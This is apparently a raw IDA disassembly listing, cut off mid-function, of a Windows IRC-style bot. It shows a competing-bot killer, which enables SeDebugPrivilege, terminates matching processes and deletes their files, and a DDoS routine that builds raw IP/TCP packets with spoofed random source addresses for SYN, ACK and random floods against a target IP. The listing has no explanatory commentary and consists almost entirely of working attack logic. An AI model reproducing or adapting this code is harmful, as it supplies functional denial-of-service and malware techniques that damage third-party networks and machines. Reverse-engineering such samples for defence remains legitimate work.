push 1
pop eax
jmp short locret_405D50
; ---------------------------------------------------------------------------
loc_405D42: ; CODE XREF: sub_405CF2+49�j
push [ebp+hFindFile] ; hFindFile
call ds:FindClose ; FindClose
xor eax, eax
locret_405D50: ; CODE XREF: sub_405CF2+4E�j
leave
retn
sub_405CF2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_405D52(LPVOID)
sub_405D52 proc near ; DATA XREF: sub_40A776+198�o
; sub_40ABFE+255D�o
var_898 = dword ptr -898h
var_894 = dword ptr -894h
var_890 = dword ptr -890h
var_88C = dword ptr -88Ch
dwMilliseconds = dword ptr -888h
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_87C = dword ptr -87Ch
var_878 = dword ptr -878h
var_874 = byte ptr -874h
Buffer = byte ptr -654h
FileName = byte ptr -550h
Dest = byte ptr -44Ch
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = byte ptr -234h
dwProcessId = dword ptr -230h
String1 = byte ptr -214h
var_110 = byte ptr -110h
var_C = dword ptr -0Ch
hObject = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 898h
push esi
push edi
mov esi, [ebp+arg_0]
lea edi, [ebp+var_24C]
movsd
movsd
movsd
movsd
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov dword ptr [eax+0Ch], 1
and [ebp+var_238], 0
push 49h
pop ecx
xor eax, eax
lea edi, [ebp+var_234]
rep stosd
and [ebp+var_878], 0
mov ecx, 88h
xor eax, eax
lea edi, [ebp+var_874]
rep stosd
push 104h ; uSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push 104h ; uSize
lea eax, [ebp+var_110]
push eax ; lpBuffer
call ds:GetWindowsDirectoryA ; GetWindowsDirectoryA
cmp dword_421D24, 0
jz short loc_405DE3
mov eax, dword_421D28
imul eax, 3E8h
push eax ; dwMilliseconds
call ds:Sleep ; Sleep
loc_405DE3: ; CODE XREF: sub_405D52+7D�j
mov [ebp+var_4], 1
loc_405DEA: ; CODE XREF: sub_405D52:loc_406330�j
cmp [ebp+var_4], 0
jz loc_406335
cmp dword_426444, 0
jz loc_40630F
cmp dword_426428, 0
jz loc_40630F
cmp dword_42636C, 0
jz loc_40630F
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_40F515
pop ecx
pop ecx
push 0
push 0Fh
call dword_426444 ; CreateToolhelp32Snapshot
mov [ebp+var_23C], eax
cmp [ebp+var_23C], 0FFFFFFFFh
jz loc_406301
mov [ebp+var_238], 128h
lea eax, [ebp+var_238]
push eax
push [ebp+var_23C]
call dword_426428 ; Process32First
test eax, eax
jz loc_4062F5
loc_405E6B: ; CODE XREF: sub_405D52:loc_4062F0�j
lea eax, [ebp+var_238]
push eax
push [ebp+var_23C]
call dword_42636C ; Process32Next
test eax, eax
jz loc_4062F5
push 0C8h ; dwMilliseconds
call ds:Sleep ; Sleep
push offset String2 ; "Nrzi.exe"
lea eax, [ebp+String1]
push eax ; lpString1
call ds:lstrcmpiA ; lstrcmpiA
test eax, eax
jz loc_4062F0
lea eax, [ebp+Buffer]
push eax
lea eax, [ebp+String1]
push eax
call sub_405CF2
pop ecx
pop ecx
test eax, eax
jz loc_4060CF
cmp dword_421D34, 0
jz loc_4060CF
and [ebp+var_880], 0
and [ebp+var_87C], 0
jmp short loc_405EF2
; ---------------------------------------------------------------------------
loc_405EE5: ; CODE XREF: sub_405D52:loc_405F29�j
mov eax, [ebp+var_87C]
inc eax
mov [ebp+var_87C], eax
loc_405EF2: ; CODE XREF: sub_405D52+191�j
cmp [ebp+var_87C], 158h
jnb short loc_405F2B
mov eax, [ebp+var_87C]
push lpString2[eax*4] ; lpString2
lea eax, [ebp+String1]
push eax ; lpString1
call ds:lstrcmpiA ; lstrcmpiA
test eax, eax
jnz short loc_405F29
mov eax, [ebp+var_880]
inc eax
mov [ebp+var_880], eax
loc_405F29: ; CODE XREF: sub_405D52+1C8�j
jmp short loc_405EE5
; ---------------------------------------------------------------------------
loc_405F2B: ; CODE XREF: sub_405D52+1AA�j
cmp [ebp+var_880], 0
jnz loc_4060CF
push [ebp+dwProcessId] ; dwProcessId
push 0 ; bInheritHandle
push 1F0FFFh ; dwDesiredAccess
call ds:OpenProcess ; OpenProcess
mov [ebp+hObject], eax
cmp [ebp+hObject], 0
jz loc_4060CF
push 0 ; uExitCode
push [ebp+hObject] ; hProcess
call ds:TerminateProcess ; TerminateProcess
test eax, eax
jnz short loc_405FC5
push [ebp+dwProcessId]
lea eax, [ebp+String1]
push eax
push offset aErrorTerminati ; "Error terminating: %s (pid: %d)!"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
push 0
push [ebp+var_244]
lea eax, [ebp+Dest]
push eax
push offset aExp_0 ; "#!exp!#"
push [ebp+var_24C]
call sub_40A08D
add esp, 14h
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
jmp loc_4060CF
; ---------------------------------------------------------------------------
loc_405FC5: ; CODE XREF: sub_405D52+213�j
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
lea eax, [ebp+String1]
push eax
lea eax, [ebp+Buffer]
push eax
push offset aSS_3 ; "%s\\%s"
lea eax, [ebp+FileName]
push eax ; Dest
call _sprintf
add esp, 10h
and [ebp+var_884], 0
push 80h ; dwFileAttributes
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
and [ebp+dwMilliseconds], 0
jmp short loc_40601F
; ---------------------------------------------------------------------------
loc_406012: ; CODE XREF: sub_405D52:loc_406051�j
mov eax, [ebp+dwMilliseconds]
inc eax
mov [ebp+dwMilliseconds], eax
loc_40601F: ; CODE XREF: sub_405D52+2BE�j
cmp [ebp+dwMilliseconds], 64h
jge short loc_406053
push [ebp+dwMilliseconds] ; dwMilliseconds
call ds:Sleep ; Sleep
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:DeleteFileA ; DeleteFileA
test eax, eax
jz short loc_406051
mov [ebp+var_884], 1
jmp short loc_406053
; ---------------------------------------------------------------------------
loc_406051: ; CODE XREF: sub_405D52+2F1�j
jmp short loc_406012
; ---------------------------------------------------------------------------
loc_406053: ; CODE XREF: sub_405D52+2D4�j
; sub_405D52+2FD�j
cmp [ebp+var_884], 0
jz short loc_40607F
push [ebp+dwProcessId]
lea eax, [ebp+FileName]
push eax
push offset aBotKilledAndRe ; "Bot killed and removed: %s (pid: %d)!"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
jmp short loc_4060A0
; ---------------------------------------------------------------------------
loc_40607F: ; CODE XREF: sub_405D52+308�j
push [ebp+dwProcessId]
lea eax, [ebp+FileName]
push eax
push offset aCanNotDeleteSP ; "Can not delete: %s (pid: %d)!"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
loc_4060A0: ; CODE XREF: sub_405D52+32B�j
push 0
push [ebp+var_244]
lea eax, [ebp+Dest]
push eax
push offset aExp_0 ; "#!exp!#"
push [ebp+var_24C]
call sub_40A08D
add esp, 14h
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
loc_4060CF: ; CODE XREF: sub_405D52+170�j
; sub_405D52+17D�j ...
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+String1]
push eax
call sub_405CF2
pop ecx
pop ecx
test eax, eax
jz loc_4062F0
cmp dword_421D38, 0
jz loc_4062F0
and [ebp+var_890], 0
and [ebp+var_88C], 0
jmp short loc_406116
; ---------------------------------------------------------------------------
loc_406109: ; CODE XREF: sub_405D52:loc_40614A�j
mov eax, [ebp+var_88C]
inc eax
mov [ebp+var_88C], eax
loc_406116: ; CODE XREF: sub_405D52+3B5�j
cmp [ebp+var_88C], 13h
jnb short loc_40614C
mov eax, [ebp+var_88C]
push off_41F6AC[eax*4] ; lpString2
lea eax, [ebp+String1]
push eax ; lpString1
call ds:lstrcmpiA ; lstrcmpiA
test eax, eax
jnz short loc_40614A
mov eax, [ebp+var_890]
inc eax
mov [ebp+var_890], eax
loc_40614A: ; CODE XREF: sub_405D52+3E9�j
jmp short loc_406109
; ---------------------------------------------------------------------------
loc_40614C: ; CODE XREF: sub_405D52+3CB�j
cmp [ebp+var_890], 0
jnz loc_4062F0
push [ebp+dwProcessId] ; dwProcessId
push 0 ; bInheritHandle
push 1F0FFFh ; dwDesiredAccess
call ds:OpenProcess ; OpenProcess
mov [ebp+hObject], eax
cmp [ebp+hObject], 0
jz loc_4062F0
push 0 ; uExitCode
push [ebp+hObject] ; hProcess
call ds:TerminateProcess ; TerminateProcess
test eax, eax
jnz short loc_4061E6
push [ebp+dwProcessId]
lea eax, [ebp+String1]
push eax
push offset aErrorTermina_0 ; "Error terminating: %s (pid: %d)!"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
push 0
push [ebp+var_244]
lea eax, [ebp+Dest]
push eax
push offset aExp_0 ; "#!exp!#"
push [ebp+var_24C]
call sub_40A08D
add esp, 14h
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
jmp loc_4062F0
; ---------------------------------------------------------------------------
loc_4061E6: ; CODE XREF: sub_405D52+434�j
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
lea eax, [ebp+String1]
push eax
lea eax, [ebp+var_110]
push eax
push offset aSS_4 ; "%s\\%s"
lea eax, [ebp+FileName]
push eax ; Dest
call _sprintf
add esp, 10h
and [ebp+var_894], 0
push 80h ; dwFileAttributes
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
and [ebp+var_898], 0
jmp short loc_406240
; ---------------------------------------------------------------------------
loc_406233: ; CODE XREF: sub_405D52:loc_406272�j
mov eax, [ebp+var_898]
inc eax
mov [ebp+var_898], eax
loc_406240: ; CODE XREF: sub_405D52+4DF�j
cmp [ebp+var_898], 64h
jge short loc_406274
push [ebp+var_898] ; dwMilliseconds
call ds:Sleep ; Sleep
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:DeleteFileA ; DeleteFileA
test eax, eax
jz short loc_406272
mov [ebp+var_894], 1
jmp short loc_406274
; ---------------------------------------------------------------------------
loc_406272: ; CODE XREF: sub_405D52+512�j
jmp short loc_406233
; ---------------------------------------------------------------------------
loc_406274: ; CODE XREF: sub_405D52+4F5�j
; sub_405D52+51E�j
cmp [ebp+var_894], 0
jz short loc_4062A0
push [ebp+dwProcessId]
lea eax, [ebp+FileName]
push eax
push offset aBotKilledAnd_0 ; "Bot killed and removed: %s (pid: %d)!"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
jmp short loc_4062C1
; ---------------------------------------------------------------------------
loc_4062A0: ; CODE XREF: sub_405D52+529�j
push [ebp+dwProcessId]
lea eax, [ebp+FileName]
push eax
push offset aCanNotDelete_0 ; "Can not delete: %s (pid: %d)!"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
loc_4062C1: ; CODE XREF: sub_405D52+54C�j
push 0
push [ebp+var_244]
lea eax, [ebp+Dest]
push eax
push offset aExp_0 ; "#!exp!#"
push [ebp+var_24C]
call sub_40A08D
add esp, 14h
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
loc_4062F0: ; CODE XREF: sub_405D52+153�j
; sub_405D52+394�j ...
jmp loc_405E6B
; ---------------------------------------------------------------------------
loc_4062F5: ; CODE XREF: sub_405D52+113�j
; sub_405D52+12E�j
push [ebp+var_23C] ; hObject
call ds:CloseHandle ; CloseHandle
loc_406301: ; CODE XREF: sub_405D52+EE�j
push 0
push offset aSedebugprivi_0 ; "SeDebugPrivilege"
call sub_40F515
pop ecx
pop ecx
loc_40630F: ; CODE XREF: sub_405D52+A9�j
; sub_405D52+B6�j ...
cmp dword_421D2C, 0
jz short loc_40632C
mov eax, dword_421D30
imul eax, 0EA60h
push eax ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_406330
; ---------------------------------------------------------------------------
loc_40632C: ; CODE XREF: sub_405D52+5C4�j
and [ebp+var_4], 0
loc_406330: ; CODE XREF: sub_405D52+5D8�j
jmp loc_405DEA
; ---------------------------------------------------------------------------
loc_406335: ; CODE XREF: sub_405D52+9C�j
push [ebp+var_248]
call sub_410709
pop ecx
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
sub_405D52 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_40634F(LPVOID)
sub_40634F proc near ; DATA XREF: sub_40ABFE+3E49�o
var_72C = word ptr -72Ch
var_72A = word ptr -72Ah
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_720 = byte ptr -720h
var_71F = byte ptr -71Fh
var_71E = word ptr -71Eh
var_71C = word ptr -71Ch
var_71A = word ptr -71Ah
var_718 = dword ptr -718h
hostshort = word ptr -714h
var_710 = dword ptr -710h
Dest = byte ptr -70Ch
var_50C = byte ptr -50Ch
s = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4E4 = dword ptr -4E4h
Src = dword ptr -4E0h
var_4DC = dword ptr -4DCh
var_4D8 = byte ptr -4D8h
var_4D7 = byte ptr -4D7h
var_4D6 = word ptr -4D6h
namelen = dword ptr -4C0h
optval = byte ptr -4BCh
name = sockaddr ptr -4B8h
var_4A8 = byte ptr -4A8h
var_318 = byte ptr -318h
var_317 = byte ptr -317h
var_304 = byte ptr -304h
var_2F8 = byte ptr -2F8h
Dst = byte ptr -2F0h
var_2DC = word ptr -2DCh
var_2DA = word ptr -2DAh
var_2D8 = dword ptr -2D8h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
String1 = byte ptr -2C4h
cp = byte ptr -2A4h
var_1A4 = byte ptr -1A4h
Str = byte ptr -124h
var_A4 = byte ptr -0A4h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 72Ch
push esi
push edi
and [ebp+var_318], 0
push 0Eh
pop ecx
xor eax, eax
lea edi, [ebp+var_317]
rep stosd
stosw
stosb
mov esi, [ebp+arg_0]
mov ecx, 0ADh
lea edi, [ebp+var_2CC]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_4E8], eax
mov eax, [ebp+var_4E8]
mov dword ptr [eax+2B0h], 1
call ds:GetTickCount ; GetTickCount
push eax
call sub_412333
pop ecx
lea eax, [ebp+Str]
push eax ; Str
call _atoi
pop ecx
mov [ebp+hostshort], ax
lea eax, [ebp+var_A4]
push eax ; Str
call _atoi
pop ecx
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_40642B
push offset aYouCantSendPac ; "You cant send packets for 0 seconds."
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
cmp [ebp+var_20], 0
jnz short loc_40640B
push 0
push [ebp+var_24]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_2CC]
call sub_40A08D
add esp, 14h
loc_40640B: ; CODE XREF: sub_40634F+99�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+var_2C8]
call sub_410709
pop ecx
xor eax, eax
jmp loc_406B06
; ---------------------------------------------------------------------------
loc_40642B: ; CODE XREF: sub_40634F+80�j
lea eax, [ebp+var_4A8]
push eax
push 202h
call dword_4263B4 ; WSAStartup
test eax, eax
jz short loc_4064A1
push offset aDdosErrorWsada ; "[DDOS] Error WSAData."
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
cmp [ebp+var_20], 0
jnz short loc_40647B
push 0
push [ebp+var_24]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_2CC]
call sub_40A08D
add esp, 14h
loc_40647B: ; CODE XREF: sub_40634F+109�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
call dword_42639C ; WSACleanup
push [ebp+var_2C8]
call sub_410709
pop ecx
xor eax, eax
jmp loc_406B06
; ---------------------------------------------------------------------------
loc_4064A1: ; CODE XREF: sub_40634F+F0�j
push 0FFh ; protocol
push 3 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0FFFFFFFFh
jnz short loc_40652B
push offset aDdosErrorCalli ; "[DDOS] Error calling socket()."
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
cmp [ebp+var_20], 0
jnz short loc_4064F9
push 0
push [ebp+var_24]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_2CC]
call sub_40A08D
add esp, 14h
loc_4064F9: ; CODE XREF: sub_40634F+187�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+s]
call dword_4264B8 ; closesocket
call dword_42639C ; WSACleanup
push [ebp+var_2C8]
call sub_410709
pop ecx
xor eax, eax
jmp loc_406B06
; ---------------------------------------------------------------------------
loc_40652B: ; CODE XREF: sub_40634F+16E�j
mov dword ptr [ebp+optval], 1
push 4 ; optlen
lea eax, [ebp+optval]
push eax ; optval
push 2 ; optname
push 0 ; level
push [ebp+s] ; s
call ds:setsockopt ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_4065C7
call dword_4263C8 ; WSAGetLastError
push eax
push offset aDdosErrorCal_0 ; "[DDOS] Error calling setsockopt(). fWSA"...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_20], 0
jnz short loc_406595
push 0
push [ebp+var_24]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_2CC]
call sub_40A08D
add esp, 14h
loc_406595: ; CODE XREF: sub_40634F+223�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+s]
call dword_4264B8 ; closesocket
call dword_42639C ; WSACleanup
push [ebp+var_2C8]
call sub_410709
pop ecx
xor eax, eax
jmp loc_406B06
; ---------------------------------------------------------------------------
loc_4065C7: ; CODE XREF: sub_40634F+202�j
lea eax, [ebp+cp]
push eax ; cp
call ds:inet_addr ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_40664D
call dword_4263C8 ; WSAGetLastError
push eax
push offset aDdosInvalidTar ; "[DDOS] :Invalid target IP."
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_20], 0
jnz short loc_40661B
push 0
push [ebp+var_24]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_2CC]
call sub_40A08D
add esp, 14h
loc_40661B: ; CODE XREF: sub_40634F+2A9�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+s]
call dword_4264B8 ; closesocket
call dword_42639C ; WSACleanup
push [ebp+var_2C8]
call sub_410709
pop ecx
xor eax, eax
jmp loc_406B06
; ---------------------------------------------------------------------------
loc_40664D: ; CODE XREF: sub_40634F+288�j
mov [ebp+var_2DC], 2
push 0 ; hostshort
call ds:htons ; htons
mov [ebp+var_2DA], ax
lea eax, [ebp+cp]
push eax ; cp
call ds:inet_addr ; inet_addr
mov [ebp+var_2D8], eax
call ds:GetTickCount ; GetTickCount
mov [ebp+var_710], eax
lea eax, [ebp+cp]
push eax
push offset aDdosSendingPac ; "[DDOS] :Sending packets to %s..."
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_20], 0
jnz short loc_4066C6
push 0
push [ebp+var_24]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_2CC]
call sub_40A08D
add esp, 14h
loc_4066C6: ; CODE XREF: sub_40634F+354�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
and [ebp+var_718], 0
loc_4066DA: ; CODE XREF: sub_40634F+71B�j
call ds:GetTickCount ; GetTickCount
sub eax, [ebp+var_710]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_18]
ja loc_406A6F
mov [ebp+namelen], 10h
push 10h ; Size
push 0 ; Val
lea eax, [ebp+name]
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+namelen]
push eax ; namelen
lea eax, [ebp+name]
push eax ; name
push [ebp+var_2CC] ; s
call ds:getsockname ; getsockname
call _rand
cdq
mov ecx, 0FFh
idiv ecx
push edx
movzx eax, [ebp+name.sa_data+4]
push eax
movzx eax, [ebp+name.sa_data+3]
push eax
movzx eax, [ebp+name.sa_data+2]
push eax
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
lea eax, [ebp+var_50C]
push eax ; Dest
call _sprintf
add esp, 18h
mov [ebp+var_14], 45h
push 28h ; hostshort
call ds:htons ; htons
mov [ebp+var_12], ax
mov [ebp+var_10], 1
and [ebp+var_E], 0
mov [ebp+var_C], 80h
mov [ebp+var_B], 6
and [ebp+var_A], 0
lea eax, [ebp+var_50C]
push eax ; cp
call ds:inet_addr ; inet_addr
mov [ebp+var_8], eax
mov eax, [ebp+var_2D8]
mov [ebp+var_4], eax
movzx eax, [ebp+hostshort]
test eax, eax
jnz short loc_4067D2
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx ; hostshort
call ds:htons ; htons
mov [ebp+var_72A], ax
jmp short loc_4067E5
; ---------------------------------------------------------------------------
loc_4067D2: ; CODE XREF: sub_40634F+464�j
push dword ptr [ebp+hostshort] ; hostshort
call ds:htons ; htons
mov [ebp+var_72A], ax
loc_4067E5: ; CODE XREF: sub_40634F+481�j
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx ; hostshort
call ds:htons ; htons
mov [ebp+var_72C], ax
push 12345678h ; hostlong
call ds:htonl ; htonl
mov [ebp+var_728], eax
push offset aDdos_syn ; "ddos.syn"
lea eax, [ebp+String1]
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz short loc_406835
and [ebp+var_724], 0
mov [ebp+var_71F], 2
loc_406835: ; CODE XREF: sub_40634F+4D6�j
push offset aDdos_ack ; "ddos.ack"
lea eax, [ebp+String1]
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz short loc_406859
and [ebp+var_724], 0
mov [ebp+var_71F], 10h
loc_406859: ; CODE XREF: sub_40634F+4FA�j
push offset aDdos_random ; "ddos.random"
lea eax, [ebp+String1]
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz short loc_40689F
call _rand
cdq
push 3
pop ecx
idiv ecx
mov [ebp+var_724], edx
call _rand
cdq
push 2
pop ecx
idiv ecx
test edx, edx
jnz short loc_406898
mov [ebp+var_71F], 2
jmp short loc_40689F
; ---------------------------------------------------------------------------
loc_406898: ; CODE XREF: sub_40634F+53E�j
mov [ebp+var_71F], 10h
loc_40689F: ; CODE XREF: sub_40634F+51E�j
; sub_40634F+547�j
mov [ebp+var_720], 50h
push 200h ; hostshort
call ds:htons ; htons
mov [ebp+var_71E], ax
and [ebp+var_71A], 0
and [ebp+var_71C], 0
mov eax, [ebp+var_8]
mov [ebp+Src], eax
mov eax, [ebp+var_4]
mov [ebp+var_4DC], eax
and [ebp+var_4D8], 0
mov [ebp+var_4D7], 6
push 14h ; hostshort
call ds:htons ; htons
mov [ebp+var_4D6], ax
push 20h ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_318]
push eax ; Dst
call _memcpy
add esp, 0Ch
push 14h ; Size
lea eax, [ebp+var_72C]
push eax ; Src
lea eax, [ebp+var_2F8]
push eax ; Dst
call _memcpy
add esp, 0Ch
push 34h
lea eax, [ebp+var_318]
push eax
call sub_40898A
pop ecx
pop ecx
mov [ebp+var_71C], ax
push 14h ; Size
lea eax, [ebp+var_14]
push eax ; Src
lea eax, [ebp+var_318]
push eax ; Dst
call _memcpy
add esp, 0Ch
push 14h ; Size
lea eax, [ebp+var_72C]
push eax ; Src
lea eax, [ebp+var_304]
push eax ; Dst
call _memcpy
add esp, 0Ch
push 4 ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
push 28h
lea eax, [ebp+var_318]
push eax
call sub_40898A
pop ecx
pop ecx
mov [ebp+var_A], ax
push 14h ; Size
lea eax, [ebp+var_14]
push eax ; Src
lea eax, [ebp+var_318]
push eax ; Dst
call _memcpy
add esp, 0Ch
push 10h
lea eax, [ebp+var_2DC]
push eax
push 0
push 3Ch
lea eax, [ebp+var_318]
push eax
push [ebp+s]
call dword_426484 ; sendto
mov [ebp+var_4E4], eax
cmp [ebp+var_4E4], 0FFFFFFFFh
jnz loc_406A5D
push [ebp+var_718]
push 3Ch
call ds:WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+cp]
push eax
push offset aDdosErrorSendi ; "[DDOS] :Error sending packets to %s. ea"...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 18h
cmp [ebp+var_20], 0
jnz short loc_406A2B
push 0
push [ebp+var_24]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_2CC]
call sub_40A08D
add esp, 14h
loc_406A2B: ; CODE XREF: sub_40634F+6B9�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+s]
call dword_4264B8 ; closesocket
call dword_42639C ; WSACleanup
push [ebp+var_2C8]
call sub_410709
pop ecx
xor eax, eax
jmp loc_406B06
; ---------------------------------------------------------------------------
loc_406A5D: ; CODE XREF: sub_40634F+685�j
mov eax, [ebp+var_718]
inc eax
mov [ebp+var_718], eax
jmp loc_4066DA
; ---------------------------------------------------------------------------
loc_406A6F: ; CODE XREF: sub_40634F+3A3�j
push [ebp+s]
call dword_4264B8 ; closesocket
mov eax, [ebp+var_718]
imul eax, 3Ch
shr eax, 0Ah
xor edx, edx
div [ebp+var_18]
push eax
mov eax, [ebp+var_718]
imul eax, 3Ch
shr eax, 0Ah
shr eax, 0Ah
push eax
push [ebp+var_718]
lea eax, [ebp+cp]
push eax
push offset aDdosFinishedSe ; "[DDOS] :Finished sending packets to %s."...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 18h
cmp [ebp+var_20], 0
jnz short loc_406AE5
push 0
push [ebp+var_24]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_2CC]
call sub_40A08D
add esp, 14h
loc_406AE5: ; CODE XREF: sub_40634F+773�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
call dword_42639C ; WSACleanup
push [ebp+var_2C8]
call sub_410709
pop ecx
xor eax, eax
loc_406B06: ; CODE XREF: sub_40634F+D7�j
; sub_40634F+14D�j ...
pop edi
pop esi
leave
retn 4
sub_40634F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_406B0C(LPVOID)
sub_406B0C proc near ; DATA XREF: sub_40ABFE+3FBC�o
var_5F4 = dword ptr -5F4h
var_5F0 = dword ptr -5F0h
Dest = byte ptr -5ECh
to = sockaddr ptr -1ECh
var_1DC = byte ptr -1DCh
var_1BC = dword ptr -1BCh
namelen = dword ptr -1B8h
optval = byte ptr -1B4h
name = sockaddr ptr -1B0h
s = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
cp = byte ptr -194h
var_94 = byte ptr -94h
hostshort = word ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5F4h
push esi
push edi
mov esi, [ebp+arg_0]
push 67h
pop ecx
lea edi, [ebp+var_19C]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_1BC], eax
mov eax, [ebp+var_1BC]
mov dword ptr [eax+198h], 1
cmp [ebp+var_10], 0
jnz short loc_406B9E
push offset aYouCantSendP_0 ; "You cant send packets for 0 seconds."
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
cmp [ebp+var_8], 0
jnz short loc_406B7E
push 0
push [ebp+var_C]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_19C]
call sub_40A08D
add esp, 14h
loc_406B7E: ; CODE XREF: sub_406B0C+4F�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+var_198]
call sub_410709
pop ecx
xor eax, eax
jmp loc_407081
; ---------------------------------------------------------------------------
loc_406B9E: ; CODE XREF: sub_406B0C+36�j
push 0FFh ; protocol
push 3 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0FFFFFFFFh
jnz short loc_406C22
push offset aDdosErrorCal_1 ; "[DDOS] Error calling socket()."
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
cmp [ebp+var_8], 0
jnz short loc_406BF6
push 0
push [ebp+var_C]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_19C]
call sub_40A08D
